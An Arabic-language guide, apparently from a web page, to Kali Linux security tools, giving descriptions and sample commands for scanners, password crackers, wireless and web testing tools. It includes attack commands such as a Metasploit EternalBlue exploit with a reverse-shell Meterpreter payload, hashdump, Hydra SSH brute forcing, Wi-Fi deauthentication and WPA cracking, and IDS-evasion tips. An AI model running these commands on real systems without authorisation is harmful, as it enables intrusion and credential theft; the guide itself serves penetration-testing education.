دليل أدوات كالي لينكس الشامل

🕵️

Nmap

أداة قوية لاكتشاف الشبكات ومسح المنافذ وتحديد الخدمات المتاحة

📋 الوصف المفصل:

Nmap (Network Mapper) هي أداة مفتوحة المصدر لاستكشاف الشبكات وتدقيق الأمان. تُستخدم لاكتشاف الأجهزة المتصلة بالشبكة، تحديد المنافذ المفتوحة، معرفة الخدمات المتاحة وإصداراتها، واكتشاف أنظمة التشغيل. تدعم العديد من تقنيات المسح المتقدمة وتوفر نتائج دقيقة وسريعة.

💻 أمثلة الاستخدام:

nmap -sS 192.168.1.1

مسح SYN سريع للمنافذ الشائعة

nmap -sV -O 192.168.1.0/24

اكتشاف الخدمات وأنظمة التشغيل لشبكة كاملة

nmap --script vuln target.com

فحص الثغرات باستخدام NSE scripts

nmap -p- -T4 192.168.1.100

مسح جميع المنافذ (1-65535) بسرعة عالية

⚙️ الخيارات المهمة:

-sS SYN Scan (سريع وخفي)

-sU UDP Scan

-sV اكتشاف إصدارات الخدمات

-O اكتشاف نظام التشغيل

-A مسح شامل (OS + Services + Scripts)

-T4 سرعة المسح (0-5)

⚠️ احتياطات الأمان:

• استخدم فقط على الشبكات التي تملكها أو لديك إذن لفحصها
• قد يتم اكتشافك من قبل أنظمة IDS/IPS
• استخدم خيارات التخفي مثل -f للتجزئة
• تجنب المسح العدواني على الأنظمة الحساسة

مسح المنافذ اكتشاف الخدمات

🌐

Maltego

أداة تحليل الروابط والعلاقات لجمع المعلومات من مصادر مختلفة

📋 الوصف المفصل:

Maltego هي منصة قوية لتحليل الروابط والاستخبارات مفتوحة المصدر (OSINT). تساعد في رسم خرائط بصرية للعلاقات بين الأشخاص، المؤسسات، المواقع، والبيانات الرقمية. تجمع المعلومات من مصادر متعددة وتعرضها في شكل رسوم بيانية تفاعلية لفهم الصلات المعقدة.

💻 طرق الاستخدام:

maltego

تشغيل الواجهة الرسومية

خطوات العمل:

1. إنشاء Graph جديد
2. إضافة Entity (شخص، موقع، إيميل)
3. تشغيل Transforms لجمع البيانات
4. تحليل النتائج والروابط

🔧 الميزات الرئيسية:

• Transforms: وحدات لجمع البيانات من مصادر مختلفة

• Entities: عناصر البيانات (أشخاص، مواقع، شركات)

• Graphs: الرسوم البيانية التفاعلية

• TDS: خادم البيانات للمعلومات المتقدمة

• Machines: سلاسل آلية من Transforms

📊 حالات الاستخدام:

• التحقيق في الجرائم السيبرانية
• تحليل التهديدات الأمنية
• البحث عن المعلومات المفتوحة
• تحليل الشبكات الاجتماعية
• فحص البنية التحتية للمؤسسات

⚠️ ملاحظات مهمة:

• النسخة المجانية محدودة الميزات
• يتطلب تسجيل حساب للاستخدام الكامل
• احترم خصوصية الأفراد والقوانين المحلية
• بعض Transforms تتطلب مفاتيح API خارجية

تحليل البيانات OSINT

📡

Recon-ng

إطار عمل شامل لجمع المعلومات مع وحدات متعددة

recon-ng

جمع المعلومات وحدات متعددة

🔍

Nessus

ماسح ثغرات شامل لتحديد نقاط الضعف في الأنظمة

nessusd -D

مسح الثغرات تقارير مفصلة

⚡

OpenVAS

منصة مفتوحة المصدر لإدارة الثغرات ومسح الأمان

openvas-start

مفتوح المصدر إدارة الثغرات

🎯

Nikto

ماسح ثغرات خوادم الويب للبحث عن ملفات وبرامج خطيرة

nikto -h target_url

خوادم الويب فحص سريع

💥

Metasploit

إطار عمل شامل لاختبار الاختراق واستغلال الثغرات

📋 الوصف المفصل:

Metasploit هو أقوى إطار عمل لاختبار الاختراق في العالم. يحتوي على آلاف الاستغلالات (Exploits) والحمولات (Payloads) لاختبار أمان الأنظمة. يوفر واجهة موحدة لتنفيذ هجمات معقدة، إدارة الجلسات، وتطوير استغلالات مخصصة. يُستخدم من قبل محترفي الأمان والمخترقين الأخلاقيين حول العالم.

💻 أمثلة الاستخدام:

msfconsole

تشغيل واجهة سطر الأوامر

search ms17-010

البحث عن استغلالات محددة

use exploit/windows/smb/ms17_010_eternalblue

اختيار استغلال معين

set RHOSTS 192.168.1.100

تحديد الهدف

set payload windows/x64/meterpreter/reverse_tcp

اختيار الحمولة

exploit

تنفيذ الهجوم

🔧 المكونات الرئيسية:

Exploits: كود استغلال الثغرات الأمنية

Payloads: الكود المنفذ بعد نجاح الاستغلال

Auxiliary: وحدات مساعدة للمسح والفحص

Encoders: لتشفير الحمولات وتجنب الكشف

Post: وحدات ما بعد الاستغلال

Meterpreter: حمولة متقدمة للتحكم الكامل

⚙️ أوامر Meterpreter المهمة:

sysinfo معلومات النظام

getuid المستخدم الحالي

ps العمليات الجارية

migrate PID الانتقال لعملية أخرى

hashdump استخراج كلمات المرور

screenshot لقطة شاشة

⚠️ تحذيرات مهمة:

• للاستخدام الأخلاقي فقط على الأنظمة المملوكة لك
• قد يتسبب في تعطيل الأنظمة المستهدفة
• يتطلب معرفة عميقة بالأمان السيبراني
• استخدام غير قانوني يعرضك للمساءلة القانونية
• احرص على تحديث قاعدة البيانات بانتظام

استغلال الثغرات Payloads

🔓

John the Ripper

أداة قوية لكسر كلمات المرور باستخدام طرق مختلفة

john --wordlist=rockyou.txt hash.txt

كسر كلمات المرور Dictionary Attack

🌊

Hydra

أداة سريعة لهجمات القوة الغاشمة على خدمات الشبكة

hydra -l admin -P passwords.txt ssh://target

Brute Force خدمات متعددة

📶

Aircrack-ng

مجموعة أدوات شاملة لاختبار أمان الشبكات اللاسلكية

📋 الوصف المفصل:

Aircrack-ng هي مجموعة شاملة من الأدوات لاختبار أمان الشبكات اللاسلكية. تتضمن أدوات لمراقبة الشبكات، التقاط البيانات، كسر تشفير WEP/WPA/WPA2، وإجراء هجمات مختلفة على الشبكات اللاسلكية. تدعم معظم بطاقات الشبكة اللاسلكية وتوفر واجهات سطر أوامر قوية.

💻 الأدوات المتضمنة:

airmon-ng start wlan0

تفعيل وضع المراقبة

airodump-ng wlan0mon

مسح الشبكات المتاحة

aireplay-ng -0 5 -a [BSSID] wlan0mon

هجوم إلغاء المصادقة

aircrack-ng -w wordlist.txt capture.cap

كسر كلمة مرور WPA

🔧 المكونات الرئيسية:

airmon-ng: إدارة وضع المراقبة

airodump-ng: التقاط البيانات ومراقبة الشبكات

aireplay-ng: حقن الحزم وتنفيذ الهجمات

aircrack-ng: كسر تشفير WEP/WPA

airdecap-ng: فك تشفير الحزم المُلتقطة

📊 أنواع الهجمات:

• هجمات WEP (FMS, PTW, Korek)
• هجمات WPA/WPA2 Dictionary
• هجمات إلغاء المصادقة (Deauth)
• هجمات Fake Authentication
• هجمات ARP Replay

⚠️ متطلبات ومحاذير:

• يتطلب بطاقة شبكة تدعم وضع المراقبة
• قد يتطلب تعريفات خاصة للبطاقة
• استخدم فقط على الشبكات المملوكة لك
• قد يستغرق كسر WPA وقتاً طويلاً
• تأكد من قوة قاموس كلمات المرور

WiFi WEP/WPA

🎭

Kismet

كاشف شبكات لاسلكية ومحلل حركة البيانات

kismet

مراقبة الشبكات تحليل البيانات

🔥

Wifite

أداة آلية لاختبار أمان الشبكات اللاسلكية

wifite

آلي سهل الاستخدام

🔬

Autopsy

منصة الطب الشرعي الرقمي لتحليل الأقراص الصلبة

autopsy

تحليل الأقراص واجهة رسومية

🧬

Volatility

إطار عمل لتحليل ذاكرة النظام والطب الشرعي

volatility -f memory.dump imageinfo

تحليل الذاكرة Malware Analysis

🕵️‍♂️

Binwalk

أداة لتحليل واستخراج البيانات من الملفات الثنائية

binwalk -e firmware.bin

تحليل الملفات Firmware

🕷️

Burp Suite

منصة شاملة لاختبار أمان تطبيقات الويب

📋 الوصف المفصل:

Burp Suite هي المنصة الرائدة عالمياً لاختبار أمان تطبيقات الويب. تجمع بين أدوات متعددة في واجهة واحدة لتحليل واختبار التطبيقات. تتضمن Proxy لاعتراض الطلبات، Scanner لاكتشاف الثغرات، Repeater لإعادة الطلبات، وIntruder للهجمات الآلية. تدعم جميع بروتوكولات الويب الحديثة وتوفر إمكانيات تخصيص متقدمة.

💻 طريقة الاستخدام:

burpsuite

تشغيل Burp Suite

خطوات الإعداد:

1. تشغيل Burp وإعداد Proxy على المنفذ 8080
2. إعداد المتصفح لاستخدام Proxy
3. تثبيت شهادة Burp CA
4. بدء اعتراض الطلبات والتحليل

🔧 الأدوات الرئيسية:

Proxy: اعتراض وتعديل طلبات HTTP/HTTPS

Scanner: فحص آلي للثغرات الأمنية

Repeater: إعادة إرسال وتعديل الطلبات

Intruder: هجمات آلية وفحص المعاملات

Sequencer: تحليل عشوائية الرموز

Decoder: تشفير وفك تشفير البيانات

🎯 الثغرات المكتشفة:

• SQL Injection

• Cross-Site Scripting (XSS)

• CSRF

• Directory Traversal

• Authentication Bypass

• Session Management Issues

⚠️ ملاحظات مهمة:

• النسخة المجانية (Community) محدودة الميزات
• النسخة المدفوعة (Professional) توفر Scanner متقدم
• قد يبطئ تصفح الويب عند تشغيل Proxy
• يتطلب فهم عميق لبروتوكولات HTTP

Proxy Scanner

🦊

OWASP ZAP

أداة مفتوحة المصدر لاختبار أمان تطبيقات الويب

zaproxy

مفتوح المصدر OWASP

💉

SQLmap

أداة آلية لاكتشاف واستغلال ثغرات حقن SQL

sqlmap -u "target_url" --dbs

SQL Injection آلي

Nmap

📋 الوصف المفصل:

💻 أمثلة الاستخدام:

⚙️ الخيارات المهمة:

⚠️ احتياطات الأمان:

Maltego

📋 الوصف المفصل:

💻 طرق الاستخدام:

🔧 الميزات الرئيسية:

📊 حالات الاستخدام:

⚠️ ملاحظات مهمة:

Recon-ng

Nessus

OpenVAS

Nikto

Metasploit

📋 الوصف المفصل:

💻 أمثلة الاستخدام:

🔧 المكونات الرئيسية:

⚙️ أوامر Meterpreter المهمة:

⚠️ تحذيرات مهمة:

John the Ripper

Hydra

Aircrack-ng

📋 الوصف المفصل:

💻 الأدوات المتضمنة:

🔧 المكونات الرئيسية:

📊 أنواع الهجمات:

⚠️ متطلبات ومحاذير:

Kismet

Wifite

Autopsy

Volatility

Binwalk

Burp Suite

📋 الوصف المفصل:

💻 طريقة الاستخدام:

🔧 الأدوات الرئيسية:

🎯 الثغرات المكتشفة:

⚠️ ملاحظات مهمة:

OWASP ZAP

SQLmap

🚫 لا توجد أسلحة متاحة